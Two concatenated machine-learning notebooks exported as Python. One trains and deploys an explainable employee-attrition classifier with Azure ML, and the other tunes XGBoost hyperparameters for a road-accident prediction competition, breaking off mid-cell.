print("SDK version:", azureml.core.VERSION)
# -
# ## Initialize a Workspace
#
# Initialize a workspace object from persisted configuration
# + tags=["create workspace"]
from azureml.core import Workspace
ws = Workspace.from_config()
print(ws.name, ws.resource_group, ws.location, ws.subscription_id, sep='\n')
# -
# ## Explain
# Create An Experiment: **Experiment** is a logical container in an Azure ML Workspace. It hosts run records which can include run metrics and output artifacts from your experiments.
from azureml.core import Experiment
experiment_name = 'explain_model_at_scoring_time'
experiment = Experiment(workspace=ws, name=experiment_name)
run = experiment.start_logging()
# +
# get IBM attrition data
import os
import pandas as pd
outdirname = 'dataset.6.21.19'
try:
from urllib import urlretrieve
except ImportError:
from urllib.request import urlretrieve
import zipfile
zipfilename = outdirname + '.zip'
urlretrieve('https://publictestdatasets.blob.core.windows.net/data/' + zipfilename, zipfilename)
with zipfile.ZipFile(zipfilename, 'r') as unzip:
unzip.extractall('.')
attritionData = pd.read_csv('./WA_Fn-UseC_-HR-Employee-Attrition.csv')
# +
from sklearn.model_selection import train_test_split
from sklearn.externals import joblib
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.impute import SimpleImputer
from sklearn.pipeline import Pipeline
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn_pandas import DataFrameMapper
from interpret.ext.blackbox import TabularExplainer
os.makedirs('./outputs', exist_ok=True)
# Dropping Employee count as all values are 1 and hence attrition is independent of this feature
attritionData = attritionData.drop(['EmployeeCount'], axis=1)
# Dropping Employee Number since it is merely an identifier
attritionData = attritionData.drop(['EmployeeNumber'], axis=1)
attritionData = attritionData.drop(['Over18'], axis=1)
# Since all values are 80
attritionData = attritionData.drop(['StandardHours'], axis=1)
# Converting target variables from string to numerical values
target_map = {'Yes': 1, 'No': 0}
attritionData["Attrition_numerical"] = attritionData["Attrition"].apply(lambda x: target_map[x])
target = attritionData["Attrition_numerical"]
attritionXData = attritionData.drop(['Attrition_numerical', 'Attrition'], axis=1)
# Creating dummy columns for each categorical feature
categorical = []
for col, value in attritionXData.iteritems():
if value.dtype == 'object':
categorical.append(col)
# Store the numerical columns in a list numerical
numerical = attritionXData.columns.difference(categorical)
numeric_transformations = [([f], Pipeline(steps=[
('imputer', SimpleImputer(strategy='median')),
('scaler', StandardScaler())])) for f in numerical]
categorical_transformations = [([f], OneHotEncoder(handle_unknown='ignore', sparse=False)) for f in categorical]
transformations = numeric_transformations + categorical_transformations
# Append classifier to preprocessing pipeline.
# Now we have a full prediction pipeline.
clf = Pipeline(steps=[('preprocessor', DataFrameMapper(transformations)),
('classifier', RandomForestClassifier())])
# Split data into train and test
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(attritionXData,
target,
test_size = 0.2,
random_state=0,
stratify=target)
# preprocess the data and fit the classification model
clf.fit(x_train, y_train)
model = clf.steps[-1][1]
model_file_name = 'log_reg.pkl'
# save model in the outputs folder so it automatically get uploaded
with open(model_file_name, 'wb') as file:
joblib.dump(value=clf, filename=os.path.join('./outputs/',
model_file_name))
# +
# Explain predictions on your local machine
tabular_explainer = TabularExplainer(model,
initialization_examples=x_train,
features=attritionXData.columns,
classes=["Not leaving", "leaving"],
transformations=transformations)
# Explain overall model predictions (global explanation)
# Passing in test dataset for evaluation examples - note it must be a representative sample of the original data
# x_train can be passed as well, but with more examples explanations it will
# take longer although they may be more accurate
global_explanation = tabular_explainer.explain_global(x_test)
# +
from azureml.interpret.scoring.scoring_explainer import TreeScoringExplainer, save
# ScoringExplainer
scoring_explainer = TreeScoringExplainer(tabular_explainer)
# Pickle scoring explainer locally
save(scoring_explainer, exist_ok=True)
# Register original model
run.upload_file('original_model.pkl', os.path.join('./outputs/', model_file_name))
original_model = run.register_model(model_name='local_deploy_model',
model_path='original_model.pkl')
# Register scoring explainer
run.upload_file('IBM_attrition_explainer.pkl', 'scoring_explainer.pkl')
scoring_explainer_model = run.register_model(model_name='IBM_attrition_explainer', model_path='IBM_attrition_explainer.pkl')
# -
# ## Visualize
# Visualize the explanations
from azureml.contrib.interpret.visualize import ExplanationDashboard
ExplanationDashboard(global_explanation, clf, x_test)
# ## Deploy
#
# Deploy Model and ScoringExplainer
# +
from azureml.core.conda_dependencies import CondaDependencies
# WARNING: to install this, g++ needs to be available on the Docker image and is not by default (look at the next cell)
azureml_pip_packages = [
'azureml-defaults', 'azureml-contrib-interpret', 'azureml-core', 'azureml-telemetry',
'azureml-interpret'
]
# specify CondaDependencies obj
myenv = CondaDependencies.create(conda_packages=['scikit-learn', 'pandas'],
pip_packages=['sklearn-pandas', 'pyyaml'] + azureml_pip_packages,
pin_sdk_version=False)
with open("myenv.yml","w") as f:
f.write(myenv.serialize_to_string())
with open("myenv.yml","r") as f:
print(f.read())
# -
# %%writefile dockerfile
RUN apt-get update && apt-get install -y g++
from azureml.core.model import Model
# retrieve scoring explainer for deployment
scoring_explainer_model = Model(ws, 'IBM_attrition_explainer')
# +
from azureml.core.webservice import Webservice
from azureml.core.model import InferenceConfig
from azureml.core.webservice import AciWebservice
from azureml.core.model import Model
aciconfig = AciWebservice.deploy_configuration(cpu_cores=1,
memory_gb=1,
tags={"data": "IBM_Attrition",
"method" : "local_explanation"},
description='Get local explanations for IBM Employee Attrition data')
inference_config = InferenceConfig(runtime= "python",
entry_script="score_local_explain.py",
conda_file="myenv.yml",
extra_docker_file_steps="dockerfile")
# Use configs and models generated above
service = Model.deploy(ws, 'model-scoring', [scoring_explainer_model, original_model], inference_config, aciconfig)
service.wait_for_deployment(show_output=True)
# +
import requests
import json
# Create data to test service with
sample_data = '{"Age":{"899":49},"BusinessTravel":{"899":"Travel_Rarely"},"DailyRate":{"899":1098},"Department":{"899":"Research & Development"},"DistanceFromHome":{"899":4},"Education":{"899":2},"EducationField":{"899":"Medical"},"EnvironmentSatisfaction":{"899":1},"Gender":{"899":"Male"},"HourlyRate":{"899":85},"JobInvolvement":{"899":2},"JobLevel":{"899":5},"JobRole":{"899":"Manager"},"JobSatisfaction":{"899":3},"MaritalStatus":{"899":"Married"},"MonthlyIncome":{"899":18711},"MonthlyRate":{"899":12124},"NumCompaniesWorked":{"899":2},"OverTime":{"899":"No"},"PercentSalaryHike":{"899":13},"PerformanceRating":{"899":3},"RelationshipSatisfaction":{"899":3},"StockOptionLevel":{"899":1},"TotalWorkingYears":{"899":23},"TrainingTimesLastYear":{"899":2},"WorkLifeBalance":{"899":4},"YearsAtCompany":{"899":1},"YearsInCurrentRole":{"899":0},"YearsSinceLastPromotion":{"899":0},"YearsWithCurrManager":{"899":0}}'
headers = {'Content-Type':'application/json'}
# send request to service
resp = requests.post(service.scoring_uri, sample_data, headers=headers)
print("POST to url", service.scoring_uri)
# can covert back to Python objects from json string if desired
print("prediction:", resp.text)
result = json.loads(resp.text)
# +
#plot the feature importance for the prediction
import numpy as np
import matplotlib.pyplot as plt; plt.rcdefaults()
labels = json.loads(sample_data)
labels = labels.keys()
objects = labels
y_pos = np.arange(len(objects))
performance = result["local_importance_values"][0][0]
plt.bar(y_pos, performance, align='center', alpha=0.5)
plt.xticks(y_pos, objects)
locs, labels = plt.xticks()
plt.setp(labels, rotation=90)
plt.ylabel('Feature impact - leaving vs not leaving')
plt.title('Local feature importance for prediction')
plt.show()
# -
service.delete()
# ## Next
# Learn about other use cases of the explain package on a:
# 1. [Training time: regression problem](../../tabular-data/explain-binary-classification-local.ipynb)
# 1. [Training time: binary classification problem](../../tabular-data/explain-binary-classification-local.ipynb)
# 1. [Training time: multiclass classification problem](../../tabular-data/explain-multiclass-classification-local.ipynb)
# 1. Explain models with engineered features:
# 1. [Simple feature transformations](../../tabular-data/simple-feature-transformations-explain-local.ipynb)
# 1. [Advanced feature transformations](../../tabular-data/advanced-feature-transformations-explain-local.ipynb)
# 1. [Save model explanations via Azure Machine Learning Run History](../run-history/save-retrieve-explanations-run-history.ipynb)
# 1. [Run explainers remotely on Azure Machine Learning Compute (AMLCompute)](../remote-explanation/explain-model-on-amlcompute.ipynb)
# 1. [Inferencing time: deploy a remotely-trained model and explainer](./train-explain-model-on-amlcompute-and-deploy.ipynb)
| how-to-use-azureml/explain-model/azure-integration/scoring-time/train-explain-model-locally-and-deploy.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="Nov4PD2bWvzW"
# # Tuning
# + [markdown] id="dOaOqUl37a57" colab_type="text"
# Okay. We wrangled some data; ran a simple prediction and then added some more data. Lets stop for a moment, before we add even more data; and do some preliminary work.
#
# > We'll firstly try to understand why [johnowhitaker](https://datasciencecastnet.home.blog/2019/10/19/zindi-uberct-part-1-getting-started/) recommends ```logloss``` as a metric. Then establish a baseline; so we know if we're improving; or not. And finally some basic parameter tuning.
#
# * ```learning_rate```;
# * ```n_estimators```;
# * ```min_child_weight```;
# * ```max_depth```;
# * ```gamma```;
# * ```colsample_bytree```;
# * ```subsample```; and
# * ```reg_alpha```.
#
# > NOTE: I'm not a data scientist nor a machine learing expert and will not attempt any ```up/down/re-sampling``` or other techniques, such as ```SMOTE```, to balance this extremely imbalanced dataset. I'll use the built in parameters (```scale_pos_weight``` and ```max_delta_step```) with a ```threshold``` to; hopefully, get a meaningful result. My aim here is to understand how this works.
#
# *!!!! I had no idea ```parameter tuning``` was this time intensive. Running this ```notebook``` on a laptop will take more than a week !!!*
# + colab_type="code" id="FfLklF9nWvcj" colab={}
#because we're on google colab
# !pip install --upgrade pandas
# !pip install --upgrade geopandas
# #!pip install --upgrade seaborn
# + colab_type="code" id="fYS5LT6EWeiO" colab={}
# import the modules that make the magic possible
import pandas as pd
import geopandas as gpd
import numpy as np
from pathlib import Path
import matplotlib.pyplot as plt
import pickle
from joblib import dump
# + colab_type="code" id="UT_LzC2EEqeo" colab={}
import xgboost as xgb
from xgboost import XGBClassifier, plot_importance
from collections import Counter
from sklearn.model_selection import cross_val_score, StratifiedKFold, GridSearchCV, train_test_split
from sklearn import metrics
from sklearn.metrics import f1_score, classification_report, auc, log_loss, accuracy_score, confusion_matrix, precision_score, mean_squared_error, recall_score,roc_auc_score, roc_curve, average_precision_score,precision_recall_curve, mean_absolute_error
from numpy import where, mean, sqrt, argmax, arange
# + colab_type="code" id="ABt-CrXsWuVs" colab={}
# mount google drive as a file system
from google.colab import drive
drive.mount('/content/gdrive', force_remount=True)
# + colab_type="code" id="cYCuRi82X0YD" colab={}
#set path
path = Path('/content/gdrive/My Drive/Zindi_Accident')
# + colab_type="code" id="CD4zX0SubZRR" colab={}
import sys
sys.path.append('/content/gdrive/My Drive/Zindi_Accident')
# load a custom confusion_matrix tool for plotting
# courtesy - leportella (https://github.com/leportella/federal-road-accidents)
from tools import plot_confusion_matrix
# + [markdown] id="1ubaEYC9WTDU" colab_type="text"
# #### Load the data
# + colab_type="code" id="tx2JRqo9tGyA" colab={}
#load the train and test from the previous notebook
train = pd.read_csv(path/'data/train_with_weather.csv', parse_dates = ['datetime'])
test = pd.read_csv(path/'data/test_with_weather.csv', parse_dates = ['datetime'])
# + id="IUPHkBdQW9es" colab_type="code" colab={}
# define a list of column names to be used for training
x_cols = ['month', 'day', 'hour', 'longitude', 'latitude', 'WIDTH', 'LANES',
'Air_temp', 'Atmos_press', 'Atmos_press_MeanSea', 'Humidity', 'MeanWindSpeed', 'Visibility', 'DewPoint', 'Rainfall']
# + colab_type="code" id="BzPbvl3is3u2" colab={}
X, y = train[x_cols], train['y']
# + colab_type="code" id="9fe89VsIWACo" colab={}
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)
# + [markdown] id="d1Zas0haZolq" colab_type="text"
# #### Instead of ```numpy``` arrays or ```pandas``` dataFrame, ```XGBoost``` uses ```DMatrices```.
#
#
# + colab_type="code" id="nq1SGFcYeFlV" colab={}
dtrain = xgb.DMatrix(X_train, label=y_train)
dtest = xgb.DMatrix(X_test, label=y_test)
# + [markdown] id="p-Y6io42Z0er" colab_type="text"
# #### We've already seen how imbalanced the data is. Lets have another look.
# + id="3XY72D26u4rb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 54} outputId="0a2065f2-eb04-4649-c43d-a49a22c4c2e4"
# summarize dataset
classes = np.unique(y)
total = len(y)
for c in classes:
n_examples = len(y[y==c])
percent = n_examples / total * 100
print('> Class=%d : %d/%d (%.1f%%)' % (c, n_examples, total, percent))
# + [markdown] id="XDf-Z5c2aEoR" colab_type="text"
# #### Now ```logloss```.
#
# > From 01_SimpleXGB.ipynb; we've seen that ```accuracy``` does us no good. Its always going to be in the ```99%``` because of the class imbalance. ```auc``` also proved extremly optimistic when compared to an ```f1_score``` (the competition requirement).
#
# > We need another ```metric```. Following [johnowhitaker's](https://datasciencecastnet.home.blog/2019/10/19/zindi-uberct-part-1-getting-started/) lead; a crisp class label is not required; instead a probability of class membership is preferred. "*The probability summarizes the likelihood (or uncertainty) of an example belonging to each class label... [and is]... specifically designed to quantify the skill of a classifier model using the predicted probabilities instead of crisp class labels.*"
#
# > Probability metrics will summarize how well the predicted distribution of class membership matches the known class probability distribution.
#
# > This is what we need. Thanks to [machinelearningmastery](https://machinelearningmastery.com/probability-metrics-for-imbalanced-classification/)
#
# + [markdown] id="UqLnK-jghGl8" colab_type="text"
# #### We can predict certain probabilities for class 0...
# + colab_type="code" id="OJb1vly1_WnS" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="99adf3c5-6ff5-4cab-c16b-862a565d40b5"
# no skill prediction 0
probabilities = [[1, 0] for _ in range(len(y_test))]
avg_logloss = log_loss(y_test, probabilities)
print('P(class0=1): Log Loss=%.3f' % (avg_logloss))
# + [markdown] id="FCszZ-L6hPdG" colab_type="text"
# #### ...or class 1.
#
# + id="PhoWuiq7bu47" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="aad489fd-5212-478e-d8c6-0989cd23a738"
# no skill prediction 1
probabilities = [[0, 1] for _ in range(len(y_test))]
avg_logloss = log_loss(y_test, probabilities)
print('P(class1=1): Log Loss=%.3f' % (avg_logloss))
# + [markdown] id="XNADzrSlhcof" colab_type="text"
# #### A better strategy would be to predict the class distribution.
# + id="QeRisMkXbTgV" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="1fa5c47e-a58b-48ae-e052-0e75487ec193"
# baseline probabilities
probabilities = [[0.997, 0.003] for _ in range(len(y_test))]
avg_logloss = log_loss(y_test, probabilities)
print('Baseline: Log Loss=%.3f' % (avg_logloss))
# + [markdown] id="w4exv7THiJSj" colab_type="text"
# #### How do we know this is reliable?
# + id="uiNZO0FnkiU4" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="4cc55737-c038-4336-92b2-c88614036312"
# perfect probabilities
avg_logloss = log_loss(y_test, y_test)
print('Perfect: Log Loss=%.3f' % (avg_logloss))
# + [markdown] colab_type="text" id="dc0-Kv95RtWJ"
# #### We have a baseline; now some basic ```parameter``` tuning.
#
# > First we do a rough search for the optimal ```n_estimators``` (number of trees) given a range of ```learning_rate```. We'll refine it later but its a good starting point.
#
# > #### Note: I've left the ```scale_pos_weight = 18.291```; as discussed in 01_SimpleXGBoost.ipynb. I've also changed the ```max_delta_step``` to a positive value (=1) as it can help with extremely imbalanced data; based on: [here](http://ethen8181.github.io/machine-learning/trees/xgboost.html#XGBoost-Basics) and [here](https://stats.stackexchange.com/questions/387632/running-xgboost-with-highly-imbalanced-data-returns-near-0-true-positive-rate).
#
#
#
#
# + id="Qk5WdSJOXCv6" colab_type="code" colab={}
# define a model
xgb_rough = XGBClassifier(
max_depth=5,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
max_delta_step=1,
objective= 'binary:logistic',
scale_pos_weight=18.291,
seed=27)
# + id="CRTnox2yb4AF" colab_type="code" colab={}
# kfold gridsearchcv
# which n_estimators do you want to search?
n_estimators = [100, 200, 300, 400, 500]
# which learning_rate do you want to search?
learning_rate = [0.1, 0.2, 0.3]
param_grid = dict(learning_rate=learning_rate, n_estimators=n_estimators)
kfold = StratifiedKFold(n_splits=2, shuffle=True)
grid_search = GridSearchCV(xgb_rough, param_grid, scoring="neg_log_loss", n_jobs=1, cv=kfold, verbose=2)
# + id="uMJUvLDdd6pF" colab_type="code" colab={}
#define evaluation metrics
eval_set = [(X_train, y_train), (X_test, y_test)]
eval_metric = ["logloss", 'error']
# + id="ay5JQDXTdzol" colab_type="code" colab={}
# %%time
grid_result = grid_search.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="go5XtlyViUYX" colab_type="code" colab={}
# save model to file
pickle.dump(xgb_rough, open(path/'xgb_rough.pickle.dat', 'wb'))
# + id="kyNbOwPncFbT" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 315} outputId="bbd70275-66b0-4cd3-8b3f-845162c6f99f"
# summarize results
print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + id="2PODyyVhcN-L" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 498} outputId="7b468316-0f60-49a6-a626-1d1cc8da1d93"
# plot results
fig, ax = plt.subplots(figsize=(8,8))
scores = np.array(means).reshape(len(learning_rate), len(n_estimators))
for i, value in enumerate(learning_rate):
plt.plot(n_estimators, scores[i], label='learning_rate: ' + str(value))
plt.legend()
plt.xlabel('n_estimators')
plt.ylabel('Log Loss')
plt.show()
# + [markdown] id="fLhPDfxoeAQK" colab_type="text"
# #### Due to memory limitations I'm choosing a ```learning_rate``` of ```0.3```. A lower ```learning_rate``` (```0.1```/```0.2```) will require to many trees, more RAM and more time.
#
# > Lets find the proper ```n_estimators```. We ```xgb.cv``` with 10 ```early_stopping_rounds```
#
#
#
#
#
#
# + id="9mw69Z0jdF3W" colab_type="code" colab={}
xgb_smooth = XGBClassifier(
learning_rate=0.3,
n_estimators=1000,
max_depth=5,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
max_delta_step=1,
objective= 'binary:logistic',
scale_pos_weight=18.291,
seed=27)
#collect parameters
xgb_param = xgb_smooth.get_xgb_params()
# + id="CG3gWv4OW3ok" colab_type="code" colab={}
# %%time
cvresult = xgb.cv(xgb_param, dtrain, num_boost_round=xgb_smooth.get_params()['n_estimators'],
nfold=3,
metrics='logloss', early_stopping_rounds=10, verbose_eval=True)
# + id="23dmhVrJXIA8" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="e0f6dbde-39bd-4a0b-ee25-75d1f359322c"
print('Best n_estimators =', cvresult.shape[0])
# + id="e0KLpN-ixXfW" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 147} outputId="9146521b-86eb-40ee-d17a-b7aaf439d0fe"
# add the optimal n_estimators to the parameters
xgb_smooth.set_params(n_estimators=cvresult.shape[0])
# + id="yKQEKRhXxgl9" colab_type="code" colab={}
#Fit the algorithm on the data
# %time xgb_smooth.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="c3SKyKlUe2s6" colab_type="code" colab={}
# save model to file
pickle.dump(xgb_smooth, open(path/'xgb_smooth.dat', 'wb'))
# some time later...
# load model from file
#loaded_model = pickle.load(open(path/'sanral_with_weather.pickle.dat", "rb"))
# + id="rom_akWBn3go" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 295} outputId="d178fa97-ca36-4569-9670-b2d01fc13de0"
plot_importance(xgb_smooth, max_num_features = 14)
plt.show()
# + id="q0vTlDF16k6z" colab_type="code" colab={}
#Predict training set:
dtrain_predictions = xgb_smooth.predict(X_train)
train_pred = [round(value) for value in dtrain_predictions]
dtrain_predprob = xgb_smooth.predict_proba(X_train)[:,1]
#Predict training set:
dtest_predictions = xgb_smooth.predict(X_test)
test_pred = [round(value) for value in dtest_predictions]
dtest_predprob = xgb_smooth.predict_proba(X_test)[:,1]
# + colab_type="code" id="HTnGUHn1XS53" colab={"base_uri": "https://localhost:8080/", "height": 222} outputId="2619de10-56bd-495f-ff81-a68a9e0e0219"
#Print model report:
print("\nModel Report")
print("Training Accuracy : %.4g" % accuracy_score(y_train.values, train_pred))
#print("Training Accuracy : %.4g" % accuracy_score(y_train.values, dtrain_predictions))
print("AUC Score (Train): %f" % roc_auc_score(y_train, dtrain_predprob))
print("logloss (Train): %f" % log_loss(y_train, dtrain_predprob))
print("Preliminary f1-score (Train): %f" %f1_score(y_train, dtrain_predictions))
print('')
print("Test Accuracy : %.4g" % accuracy_score(y_test.values, test_pred))
#print("Test Accuracy : %.4g" % accuracy_score(y_test.values, dtest_predictions))
print("AUC Score (Test): %f" % roc_auc_score(y_test, dtest_predprob))
print("logloss (Test): %f" % log_loss(y_test, dtest_predprob))
print("Preliminary f1-score (Test): %f" %f1_score(y_test, dtest_predictions))
# + [markdown] id="JvQlpxTfmZu6" colab_type="text"
# #### ```logarithmic loss``` of the XGBoost model for each epoch on the training and test datasets.
#
#
# + id="So4L4rCOa2V1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 444} outputId="f7a806fd-1abc-4fa1-cdcf-b1a6967d0d77"
# retrieve performance metrics
results = xgb_smooth.evals_result()
epochs = len(results['validation_0']['error'])
x_axis = range(0, epochs)
# plot log loss
fig, ax = plt.subplots(figsize=(7,7))
ax.plot(x_axis, results['validation_0']['logloss'], linestyle = '-', label='Train')
ax.plot(x_axis, results['validation_1']['logloss'], linestyle = '--', label='Test')
ax.legend()
plt.ylabel('Log Loss')
plt.title('XGBoost Log Loss')
plt.show()
# + [markdown] id="nW0b_jZGjLC0" colab_type="text"
# #### Good. Lets move along to ```max_depth``` (*represents the depth of each tree, and is the maximum number of different features used in each tree - it will help simplify your model and avoid overfitting*) and ```min_child_weight```.
#
# > Again we firstly do a rough search along a ```range``` of values; then iteratively refine.
#
#
# + id="mCFqAfATjImK" colab_type="code" colab={}
param_test1 = {
'max_depth':range(3,11,3),
'min_child_weight':range(1,9,3)
}
gsearch1 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=339, max_depth=5, max_delta_step=1,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test1, scoring='neg_log_loss',n_jobs=1, cv=2, verbose=2)
# + id="yRezZ03Kj-PJ" colab_type="code" colab={}
# %%time
gsearch1.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="MtRs49zklTKe" colab_type="code" colab={}
# save model to file
#pickle.dump(gsearch1, open(path/'gsearch1.pickle.dat', 'wb'))
# load model from file
gsearch1 = pickle.load(open(path/'gsearch1.pickle.dat', "rb"))
# + id="8fR_KNFawHn2" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 203} outputId="3e4e4379-193e-42e7-b1b9-d256b2c6de3a"
# summarize results
print("Best: %f using %s" % (gsearch1.best_score_, gsearch1.best_params_))
means = gsearch1.cv_results_['mean_test_score']
stds = gsearch1.cv_results_['std_test_score']
params = gsearch1.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + [markdown] id="nrb2CQYYyHCC" colab_type="text"
# #### A graph is always useful
# + id="WTrlK_YJs4D2" colab_type="code" colab={}
def plot_grid_search(cv_results, grid_param_1, grid_param_2, name_param_1, name_param_2):
'''
Define a function to plot search parameters vs cv_results
'''
# Get Test Scores Mean and std for each grid search
scores_mean = cv_results['mean_test_score']
scores_mean = np.array(scores_mean).reshape(len(grid_param_2),len(grid_param_1))
scores_sd = cv_results['std_test_score']
scores_sd = np.array(scores_sd).reshape(len(grid_param_2),len(grid_param_1))
# Plot Grid search scores
_, ax = plt.subplots(1,1)
# Param1 is the X-axis, Param 2 is represented as a different curve (color line)
for idx, val in enumerate(grid_param_2):
ax.plot(grid_param_1, scores_mean[idx,:], '-o', label= name_param_2 + ': ' + str(val))
ax.set_title("Grid Search Scores", fontsize=20, fontweight='bold')
ax.set_xlabel(name_param_1, fontsize=16)
ax.set_ylabel('CV Average Score', fontsize=16)
ax.legend(fontsize=15, bbox_to_anchor=(1.04,0.5), loc="center left")
ax.grid('on')
# + id="as1gXMTus8A7" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 307} outputId="008413ad-f5e6-4656-87fc-83757118152b"
# Calling Method
plot_grid_search(gsearch1.cv_results_, param_test1['max_depth'],
param_test1['min_child_weight'], 'max_depth', 'min_child_weight')
# + [markdown] id="ilHpcxf6qzY3" colab_type="text"
# #### We ```fit 2 folds for each of 9 candidates, totalling 18``` combinations with an interval of ```3```. The ideal values are ```9``` for ```max_depth``` and ```1``` for ```min_child_weight```. Now we search with a different range. The idea here is to iterately narrow the search space.
#
# > A ```GridSearch```, through the entire parameter range ```[1, 10]```, with a ```step``` of ```1``` takes to long (*+12-hours*). I prefer this method.
#
#
# + id="HfACL6U1h8so" colab_type="code" colab={}
param_test2 = {
'max_depth':range(2,11,3),
'min_child_weight':range(2,11,3)
}
gsearch2 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=339, max_depth=5, max_delta_step=1,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test2, scoring='neg_log_loss',n_jobs=1, cv=2, verbose=2)
# + id="_glMf_dyiHf5" colab_type="code" colab={}
# %%time
gsearch2.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="yK50VPX10_dA" colab_type="code" colab={}
# save model to file
pickle.dump(gsearch2, open(path/'gsearch2.pickle.dat', 'wb'))
# + id="cpbD5-evv23X" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 203} outputId="3b99f19c-2b46-4a2d-fd41-1f433183415c"
# summarize results
print("Best: %f using %s" % (gsearch2.best_score_, gsearch2.best_params_))
means = gsearch2.cv_results_['mean_test_score']
stds = gsearch2.cv_results_['std_test_score']
params = gsearch2.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + id="30n_aGS20_w-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 307} outputId="ff7bf369-593e-4841-c502-c613b3d681a8"
# call the plot
plot_grid_search(gsearch2.cv_results_, param_test2['max_depth'],
param_test2['min_child_weight'], 'max_depth', 'min_child_weight')
# + [markdown] id="JufeCVckuldM" colab_type="text"
# #### We see from: ```2 folds for each of 9 candidates, totalling 18 fits``` with an interval of ```3```; the ideal values are ```8``` for ```max_depth``` and ```2``` for ```min_child_weight```.
#
# #### Now we search between this result; and the previous.
#
#
# + id="VLhsHBf_0_uU" colab_type="code" colab={}
param_test3 = {
'max_depth':[8,9],
'min_child_weight':[1,2]
}
gsearch3 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=339, max_depth=5, max_delta_step=1,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test3, scoring='neg_log_loss',n_jobs=1, cv=2, verbose=2)
# + id="SvWgmcfM0_tJ" colab_type="code" colab={}
# %%time
gsearch3.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="KYUO3ryG0_lw" colab_type="code" colab={}
# save model to file
pickle.dump(gsearch3, open(path/'gsearch3.pickle.dat', 'wb'))
# + id="tWCAZ_W_wp_4" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 110} outputId="f5570377-3a80-4882-deae-cd431b5874c4"
# summarize results
print("Best: %f using %s" % (gsearch3.best_score_, gsearch3.best_params_))
means = gsearch3.cv_results_['mean_test_score']
stds = gsearch3.cv_results_['std_test_score']
params = gsearch3.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + id="GtJzjSHL0_hP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 307} outputId="b1fe5210-8eaa-478f-9e5c-6f3fb66d1a22"
# call the plot
plot_grid_search(gsearch3.cv_results_, param_test3['max_depth'],
param_test3['min_child_weight'], 'max_depth', 'min_child_weight')
# + [markdown] id="RSDA48VFVKtE" colab_type="text"
# #### We have ```max_depth```: 9 and ```min_child_weight```: 1.
#
# #### Now lets tune ```gamma``` using the parameters above. ```gamma``` can take various values but we'll check for 2 values <> More values require more ```tuning``` time.
# + id="XjEAbrcqVo0b" colab_type="code" colab={}
param_test4 = {
'gamma':[i/10.0 for i in range(0,2)]
}
gsearch4 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=339, max_depth=9, max_delta_step=1,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test4, scoring='neg_log_loss',n_jobs=1, cv=3, verbose=2)
# + id="R1hvADuR4aHV" colab_type="code" colab={}
# %%time
gsearch4.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="TyYhWxrYVp2n" colab_type="code" colab={}
# save model to file
pickle.dump(gsearch4, open(path/'gsearch4.pickle.dat', 'wb'))
# + id="mFBhd4CkwwqK" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 73} outputId="94ecfb22-a35a-47d8-9aad-c5fb584cb1e3"
# summarize results
print("Best: %f using %s" % (gsearch4.best_score_, gsearch4.best_params_))
means = gsearch4.cv_results_['mean_test_score']
